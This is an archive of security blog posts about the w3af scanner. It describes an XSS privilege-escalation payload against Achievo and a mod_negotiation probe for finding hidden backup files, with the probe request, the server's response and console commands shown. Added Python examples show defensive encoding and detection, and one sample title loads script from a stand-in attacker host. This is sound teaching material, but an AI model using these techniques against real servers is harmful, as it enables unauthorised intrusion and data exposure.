Posts Tagged ‘w3af’

w3af wins “Segurinfo 2009” award

March 20th, 2010

In the context of the 7th International Congress of Information Security, Andrés Riancho was awarded the Segurinfo award for his efforts in the development of w3af, an Open Source tool for identifying Web application vulnerabilities. We would like to congratulate him and the rest of the project contributors for this well deserved award!


Posted by admin in conferences, security, w3af

Second w3af training @ New York

October 13th, 2009

Bonsai and NopSec have partnered to deliver the second w3af ninja training course in New York City.

The w3af ninja training course is focused on manual and automated discovery and exploitation of web application vulnerabilities using w3af. During this course you’ll also learn how to write your own exploits and customized plugins in order to achieve your goals during a web application penetration test.

This course is an intense hands-on class in which you won’t stop learning for a minute. In each practice we’ll focus on a particular type of web application vulnerability, which is first analyzed and understood manually; its detection and exploitation is then automated using w3af.

Throughout the training, interesting plugin code snippets will be analyzed and modified, which will give you a solid understanding of the framework and the means to automate your future web application penetration tests.

Important information

This is a great opportunity to master the w3af framework, don’t miss it!

Posted by andres.riancho in bonsai, security, w3af

Cross Site Scripting Payloads

October 13th, 2009

Most of us are tired of the usual Cross Site Scripting vulnerabilities that get reported every day on full-disclosure, so when one of our researchers found an XSS in an Open Source project, we hesitated to publish it. After some thought, we started to realize that it might be interesting to the general public to see a customized XSS payload that exploits the Web application, which suddenly made our newly discovered XSS vulnerability much more fun.

The vulnerability that we’re going to be exploiting is a persistent cross site scripting in Achievo. For those who do not know, Achievo is a flexible web-based resource management tool for business environments. Achievo’s resource management capabilities enable organizations to support their business processes in a simple but effective manner. This vulnerability was found a while ago by our research team, and has been fixed in version 1.4.0.

The vulnerability is a really basic persistent XSS: we can write virtually anything in the title of a scheduled meeting. As a user’s meetings can be seen by other users, and most interestingly by administrators, the XSS can be exploited to elevate privileges in the application.

With the objective of writing the XSS payload, I developed a JavaScript export feature that allows w3af users to export any HTTP request to JavaScript that reproduces the same request when a user loads the script in a browser.

w3af's JavaScript Export

Using the newly created feature, we were able to easily create a JavaScript payload that, when accessed by an Achievo administrator, performs the following tasks:

  • Create a new application profile
  • Apply administrator privileges to the profile
  • Assign the newly created profile to a common user

You can find the customized XSS payload by clicking here. In order to exploit this vulnerability, a user would need to change the first four variables in the script, upload the script to a publicly accessible web server, and then point the Cross Site Scripting at that resource. After some time, if an Achievo administrator browses through the schedule, the configured user’s privileges will be elevated to administrator.

In this case it was impossible (because the application lacks that particular feature) to actually upload new files to the web server, but in many other Web applications it would have been entirely possible to create an XSS payload that uses the administrator’s privileges to upload a specially crafted file to the web server, which would then give the intruder operating system access.

With the creation of tools like w3af’s JavaScript export feature, and the huge number of XSS vulnerabilities found every day, we think that the time for customized XSS payloads written in minutes instead of hours has arrived!
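The root cause described above is the meeting title being written into the schedule page without output encoding, so that whatever a low-privileged user stores is executed in the administrator’s browser with the administrator’s session. The following Python is an added example, not code from the post or from Achievo: it renders a constructed schedule (the meeting data and the attacker.invalid host are placeholders) the vulnerable way and the hardened way, and includes a small audit helper for titles that were stored before the fix was deployed.

```python
import html
import re
from typing import Dict, List

# Constructed sample data: meeting titles as a scheduler might store them.
# The third title carries a script tag pointing at a placeholder host
# (attacker.invalid is a reserved, non-resolving name).
MEETINGS: List[Dict[str, str]] = [
    {"owner": "alice", "title": "Sprint planning"},
    {"owner": "bob", "title": "Budget review <Q3>"},
    {"owner": "mallory",
     "title": '<script src="http://attacker.invalid/x.js"></script>'},
]


def render_schedule_vulnerable(meetings: List[Dict[str, str]]) -> str:
    """The bug pattern: titles are interpolated straight into HTML, so a
    stored <script> runs in every viewer's browser, including an
    administrator's, with that viewer's session."""
    rows = "".join(f"<li>{m['owner']}: {m['title']}</li>" for m in meetings)
    return f"<ul>{rows}</ul>"


def render_schedule_hardened(meetings: List[Dict[str, str]]) -> str:
    """The fix: contextual output encoding at the point the value enters
    HTML. html.escape turns <, >, &, " and ' into entities, so the title is
    displayed as text and never parsed as markup. Bob's legitimate "<Q3>"
    still displays correctly."""
    rows = "".join(
        f"<li>{html.escape(m['owner'])}: {html.escape(m['title'], quote=True)}</li>"
        for m in meetings
    )
    return f"<ul>{rows}</ul>"


def contains_live_script(rendered: str) -> bool:
    """True if a real <script> start tag survives in the rendered document."""
    return bool(re.search(r"<\s*script\b", rendered, re.IGNORECASE))


# Crude markers of script-bearing text; a review aid, not a sanitizer.
SCRIPT_MARKUP = re.compile(r"<\s*script\b|\bon\w+\s*=|javascript\s*:", re.IGNORECASE)


def find_suspicious_titles(meetings: List[Dict[str, str]]) -> List[str]:
    """Clean-up aid for already-stored data: output encoding stops stored
    payloads from executing, but titles saved before the fix still deserve
    review. Returns the owners whose titles contain script-like markup."""
    return [m["owner"] for m in meetings if SCRIPT_MARKUP.search(m["title"])]


if __name__ == "__main__":
    print("vulnerable executes script:", contains_live_script(render_schedule_vulnerable(MEETINGS)))
    print("hardened executes script:  ", contains_live_script(render_schedule_hardened(MEETINGS)))
    print("titles to review:", find_suspicious_titles(MEETINGS))
```

Two points worth keeping in mind when applying this. Encoding belongs at output, in the template, rather than at input: the same stored title may later be emitted into a JavaScript string or an attribute, each of which needs its own encoding. And anti-CSRF tokens do not help against this class of payload, because script running in the application’s own origin can read the token from the page before submitting the forged requests; only stopping the script from executing in the first place closes the hole.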

Posted by andres.riancho in security, w3af

Web Application Security training @ FRHACK

July 29th, 2009

I’m going to be delivering a Web Application Security training at FRHACK next September 2009! FRHACK is a highly technical, non-business conference that will be held in Besançon, France. The training is a two-day, hands-on class where the w3af project leader will train you in the techniques and methodologies needed to discover and exploit web application vulnerabilities.

Here is some extra information regarding the training:

Training name: Discovery and exploitation of web application vulnerabilities

Overview

This training course focuses on the manual and automated discovery and exploitation of web application vulnerabilities. During this course you will go through a series of lectures followed by hands-on practice. In each practice you will find vulnerabilities to exploit, each with a different level of complexity, which will challenge your understanding of the subject. After the hands-on practice, a short lecture presents how the vulnerability is fixed, together with the common errors developers introduce in that process.

The training will also teach you how to use the most advanced tools used by professionals in the field, like w3af (developed by the trainer), the Burp Suite, sqlmap and many others.

Course Structure

This is a two-day course that combines lectures with increasingly difficult hands-on exercises designed to teach the attendee different ways to discover and exploit web application vulnerabilities. All course materials, and a certificate of completion will be offered. You must provide your own laptop.

Deliverables

- Training booklet with printed slides and trainer comments
- Live CD with Web Application Security Tools
- VMware image with the training environment
- w3af T-Shirt ;)

Audience

Security consultants, system and network administrators, experienced web application developers, information security officers, government agencies.

Topics Covered

  • Day One
    1. HTTP protocol review
      • Web architecture
      • HTTP headers and methods
      • HTTP authentication
      • HTTPS
      • Session management: cookies
    2. Common web server misconfigurations
      • Banners
      • Directory Indexing
      • HTTP authentication
      • HTTP method restrictions
    3. Common development and configuration errors
      • HTML comments and versioning
      • File inclusions
      • Backup and local database files
      • Hidden HTML Fields
      • Path Disclosure and directory enumeration
      • Exceptions and error messages
    4. Types of analysis
      • Static code analysis, black box testing and gray box testing:
        • Definitions
        • Vulnerabilities that can be detected
        • Vulnerabilities that CAN’T be detected
    5. Web Application Vulnerabilities
      • Reverse engineering of Java applets and Flash movies
      • Local file read
      • Local file inclusions
      • Path Traversal and Null Bytes
      • Remote file inclusions
      • Cross Site Scripting (XSS)
      • Cross Site Tracing
      • Cross Site Request Forgeries / Session Riding
      • HTTP Response Splitting
  • Day Two
    1. Web Application Vulnerabilities
      • Uncommon attack vectors
      • LDAP Injection
      • OS Commanding
      • SQL Injection:
        • Enumeration of tables and columns
        • Execution of queries and stored procedures
        • Creation of files
        • Execution of OS commands
      • Blind SQL Injection
    2. Web application privilege escalation
      • Session handling
      • Logical vulnerabilities
    3. Countermeasures
      • mod_security
      • Hardening for Java
        • HDIV
        • Spring Security
      • PHP hardening:
        • Secure configuration parameters
        • GRASP
        • PHP-IDS

Posted by andres.riancho in bonsai, conferences

Exploiting HTTP Content Negotiation

June 4th, 2009

A couple of days ago I sent an email to the w3af-users mailing list about a nice little trick that can be used to get a partial directory listing using mod_negotiation’s HTTP content negotiation feature. After half an hour of coding and some minutes of testing, I had a new discovery plugin for w3af that could exploit this feature.

Before going into detail about this technique I have to say that by no means do I take the credit for discovering it: Stefano Di Paola pointed out to me that he blogged about it in 2007, and I found out about it reading the report of a commercial Web Application Scanner that was handed to me by a client. It seems that this is one of those not-so-well-known vulnerabilities that resurface from time to time.

The idea of this post is to make this vulnerability widely known and to show that there is an automated way of exploiting it with w3af. This can be really helpful during the information gathering phase of a Web Application Penetration Test, in order to find new resources like backup files (users.zip), old versions of scripts with extensions that won’t be interpreted by Apache (users.php.old), etc.

Enough with the introduction, here is the trick:

GET /backup HTTP/1.0
Accept: foobar/xyz
User-Agent: w3af
Host: 192.168.150.2
Connection: Close

HTTP/1.1 406 Not Acceptable
content-length: 770
vary: negotiate,accept
server: Apache/2.2.8 (Ubuntu)
tcn: list
connection: close
date: Thu, 04 Jun 2009 13:37:35 GMT
content-type: text/html; charset=iso-8859-1
alternates:
   {"backup.php.bak" 1 {type application/x-trash} {length 0}},
   {"backup.php.old" 1 {type application/x-trash} {length 0}},
   {"backup.tgz" 1 {type application/x-gzip} {length 0}},
   {"backup.zip" 1 {type application/zip} {length 0}}

What is basically happening here is that we send a specially crafted request for the “/backup” resource with an invalid “Accept” header. Apache receives this request and hands it to mod_negotiation. The module lists the contents of the “/” directory, builds a list of alternates for the backup resource, and returns that list in the Alternates response header.

The only limitation of this technique is that a file is only included as an alternate if it has a known extension. Known extensions in Apache are defined (at least in Ubuntu) by /etc/mime.types and by the AddType directives in Apache’s config file. To see why this matters, here is the directory listing for the webroot of the test environment:

dz0@brick:/var/www$ ls backup*
backup.php~  backup.php.bak  backup.php.lala
backup.php.old  backup.tgz  backup.zip

Notice that backup.php~ and backup.php.lala were not included in the alternates response header.
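To make the trick above concrete from the defender’s side, here is an added Python example (not the w3af plugin’s code, nor code from the post) that parses the 406 response shown above, recognizes the mod_negotiation fingerprint, extracts the disclosed file names from the folded Alternates header, and compares them against the “ls backup*” listing to show which files stayed hidden. The sample response and the listing are copied from the post; the fingerprint check (406 plus TCN: list plus an Alternates header) and the list of backup-like suffixes are my own assumptions.

```python
import re
from typing import Dict, List, Set, Tuple

# Sample 406 response copied from the blog post (probe against /backup with
# "Accept: foobar/xyz"), embedded so the example runs offline.
SAMPLE_RESPONSE = (
    "HTTP/1.1 406 Not Acceptable\r\n"
    "content-length: 770\r\n"
    "vary: negotiate,accept\r\n"
    "server: Apache/2.2.8 (Ubuntu)\r\n"
    "tcn: list\r\n"
    "connection: close\r\n"
    "date: Thu, 04 Jun 2009 13:37:35 GMT\r\n"
    "content-type: text/html; charset=iso-8859-1\r\n"
    "alternates:\r\n"
    '   {"backup.php.bak" 1 {type application/x-trash} {length 0}},\r\n'
    '   {"backup.php.old" 1 {type application/x-trash} {length 0}},\r\n'
    '   {"backup.tgz" 1 {type application/x-gzip} {length 0}},\r\n'
    '   {"backup.zip" 1 {type application/zip} {length 0}}\r\n'
    "\r\n"
)

# Files actually present in the test webroot, from the "ls backup*" listing.
WEBROOT_LISTING = ["backup.php~", "backup.php.bak", "backup.php.lala",
                   "backup.php.old", "backup.tgz", "backup.zip"]


def parse_response_head(raw: str) -> Tuple[int, Dict[str, str]]:
    """Return (status code, headers). Header names are lower-cased, and folded
    continuation lines (leading SP/HTAB, as Apache emits for Alternates) are
    joined onto the preceding header value."""
    lines = raw.splitlines()
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    current = None
    for line in lines[1:]:
        if not line.strip():
            break                       # blank line ends the header block
        if line[0] in " \t" and current is not None:
            headers[current] = (headers[current] + " " + line.strip()).strip()
        else:
            name, _, value = line.partition(":")
            current = name.strip().lower()
            headers[current] = value.strip()
    return status, headers


# One variant looks like {"name" quality {type ...} {length ...} ...}
VARIANT_RE = re.compile(r'\{"([^"]+)"\s+[\d.]+((?:\s*\{[^{}]*\})*)\s*\}')
ATTR_RE = re.compile(r'\{(\w+)\s+([^{}]*)\}')


def parse_alternates(value: str) -> List[Dict[str, str]]:
    """Parse an Alternates header value into dicts with the variant name and
    its attributes (type, length, ...)."""
    variants = []
    for name, attrs in VARIANT_RE.findall(value):
        entry = {"name": name}
        for key, val in ATTR_RE.findall(attrs):
            entry[key] = val.strip()
        variants.append(entry)
    return variants


def negotiation_enabled(status: int, headers: Dict[str, str]) -> bool:
    """Assumed fingerprint for 'mod_negotiation is answering': a 406 that
    carries TCN: list and an Alternates header."""
    return (status == 406 and headers.get("tcn", "").lower() == "list"
            and "alternates" in headers)


def disclosed_files(raw: str) -> List[str]:
    """File names the server volunteered for the requested resource."""
    status, headers = parse_response_head(raw)
    if not negotiation_enabled(status, headers):
        return []
    return [v["name"] for v in parse_alternates(headers["alternates"])]


# Suffixes typical of backup and editor leftovers (my own list).
BACKUP_HINTS = (".bak", ".old", ".orig", ".zip", ".tgz", ".tar", ".gz", "~")


def likely_leftovers(names: List[str]) -> List[str]:
    """Disclosed names that look like backups and should not sit in a webroot."""
    return [n for n in names if n.lower().endswith(BACKUP_HINTS)]


def not_disclosed(listing: List[str], disclosed: List[str]) -> Set[str]:
    """Files on disk that Alternates did not mention: those whose extension
    Apache does not know, exactly as the post observes."""
    return set(listing) - set(disclosed)


if __name__ == "__main__":
    found = disclosed_files(SAMPLE_RESPONSE)
    print("disclosed:", found)
    print("leftovers:", likely_leftovers(found))
    print("hidden from Alternates:", sorted(not_disclosed(WEBROOT_LISTING, found)))
```

Run against your own server’s responses, the script tells you two things: whether the server is talking back with Alternates at all, and which leftover files are being advertised. The post does not say so, but this directory scan is performed by mod_negotiation only when Apache’s MultiViews option is active, so “Options -MultiViews” on the relevant directory stops the disclosure; removing backup files from the webroot remains the real fix, since the unlisted ones (backup.php~ here) are still downloadable by anyone who guesses the name.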

Matt Tesauro has written a very detailed post describing this technique, based on his tests with mod_negotiation and mod_spelling; it is also worth reading.

Exploiting

The objective of this exploit is to gather information about new and unknown resources very efficiently. When mod_negotiation is disabled and no directory listing is available, the only way to get a full list of the files inside a directory is by bruteforcing them. Bruteforce attacks can take a lot of time, and are mostly useless if performed blindly.

Using this technique, I created a new discovery plugin called “content_negotiation” that performs these steps:

  1. Identify whether mod_negotiation is enabled.
  2. For every file found by the discovery.webSpider plugin, list the alternate resources.
  3. For every directory found by the discovery.webSpider plugin, perform a small bruteforce with common file names.

w3af>>> plugins
w3af/plugins>>> discovery content_negotiation, webSpider
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target

http://localhost/w3af/discovery/content_negotiation/backup.php

w3af/config:target>>> back
w3af>>> start
HTTP Content negotiation is enabled in the remote web server.
This could be used to bruteforce file names and find new
resources. This information was found in the request with id 27.
New URL found by webSpider plugin:

http://localhost/w3af/discovery/content_negotiation/

New URL found by content_negotiation plugin:

http://localhost/w3af/discovery/content_negotiation/backup.gz

New URL found by content_negotiation plugin:

http://localhost/w3af/discovery/content_negotiation/backup.tar

New URL found by content_negotiation plugin:

http://localhost/w3af/discovery/content_negotiation/backup.zip

The plugin is publicly available in the SVN version of w3af; test it with your web server and comment on this blog post or on the w3af-users mailing list about your experiences with it. If you have ideas on how to improve the plugin, or different ways of exploiting this mod_negotiation feature, I would love to hear about them!

I’m sure that attendees in our Web Application Security Training course will love to play with this new w3af plugin :)

Posted by andres.riancho in open source, security, w3af